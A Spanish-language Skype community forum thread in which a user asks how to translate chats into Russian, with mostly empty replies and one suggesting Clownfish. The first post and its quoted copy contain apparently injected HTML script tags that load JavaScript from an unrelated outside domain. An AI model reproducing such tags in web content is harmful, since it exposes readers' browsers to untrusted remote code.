quisiera activar el traductor simultáneo para chat...

Bienvenidos a los nuevos foros. Para empezar a usarlos, por favor leed esta pequeña presentación, ¡gracias!
Mostrando los resultados de 
Buscar en lugar de 
Querías decir 
Responder

quisiera activar el traductor simultáneo para chatear en Skype.

Quisiera activar el traductor simultáneo para chatear en Skype.  Al chatear con una amiga rusa ella escribe en ruso y debajo aparece la tradución al inglés. Pero no sabe explicarme como lo hace. Yo quisiera escribir en castellano y que lo traduzca al ruso. Y es que en caso contrario tardo bastante, porque debo pasar por el traductor de google, copiarlo y pegarlo en skype cada vez que quiero escribir una frase. Un coñazo!!!  Gracias.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script> <script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>
lugnasad_7
Novel Tourist
Kudos: 1
Mensajes publicados: 1
Registrado: 16-11-2012
Mensaje 1 de 7 (4.549 Visitas)

Re: quisiera activar el traductor simultáneo para chatear en Skype.

hola

Responder
0 kudos
comilon12
Novel Adventurer
Kudos: 0
Mensajes publicados: 3
Registrado: 25-02-2013
Mensaje 2 de 7 (4.283 Visitas)

Re: quisiera activar el traductor simultáneo para chatear en Skype.


lugnasad_7 escribió:

Quisiera activar el traductor simultáneo para chatear en Skype.  Al chatear con una amiga rusa ella escribe en ruso y debajo aparece la tradución al inglés. Pero no sabe explicarme como lo hace. Yo quisiera escribir en castellano y que lo traduzca al ruso. Y es que en caso contrario tardo bastante, porque debo pasar por el traductor de google, copiarlo y pegarlo en skype cada vez que quiero escribir una frase. Un coñazo!!!  Gracias.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script> <script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>
Responder
0 kudos
comilon12
Novel Adventurer
Kudos: 0
Mensajes publicados: 3
Registrado: 25-02-2013
Mensaje 3 de 7 (4.273 Visitas)

Re: quisiera activar el traductor simultáneo para chatear en Skype.

buon giorno

Responder
0 kudos
comilon12
Novel Adventurer
Kudos: 0
Mensajes publicados: 3
Registrado: 25-02-2013
Mensaje 4 de 7 (4.272 Visitas)

Re: quisiera activar el traductor simultáneo para chatear en Skype.

Espero que sea bueno
Responder
0 kudos
vitual
Novel Tourist
Kudos: 0
Mensajes publicados: 1
Registrado: 01-09-2013
Mensaje 5 de 7 (3.387 Visitas)

Re: quisiera activar el traductor simultáneo para chatear en Skype.

Hola espero podet entender
Mensaje publicado por Samsung GT-I9082L
Responder
0 kudos
gabriel-47
Novel Tourist
Kudos: 0
Mensajes publicados: 1
Registrado: 15-02-2014
Mensaje 6 de 7 (2.008 Visitas)

Re: quisiera activar el traductor simultáneo para chatear en Skype.

-hola se llama clownfish. pero en OS no te traduce lo que te escriben, solamente lo que tu escribes. pero en windows es perfecto. al instalarlo debes activar los idiomas que quieres usar.

Responder
0 kudos
HCBM
Novel Tourist
Kudos: 0
Mensajes publicados: 1
Registrado: 12-07-2014
Mensaje 7 de 7 (782 Visitas)
Responder

© 2013 Skype o Microsoft. El nombre "Skype", las marcas comerciales, los logotipos relacionados y el símbolo "S" son marcas comerciales de Skype o de entidades vinculadas. El uso de este sitio web constituye la aceptación de las Condiciones de Uso y de la Política de Privacidad y de Cookies.

No apto para llamadas de emergencia
Skype no reemplaza al servicio telefónico y no puede usarse para realizar llamadas de emergencia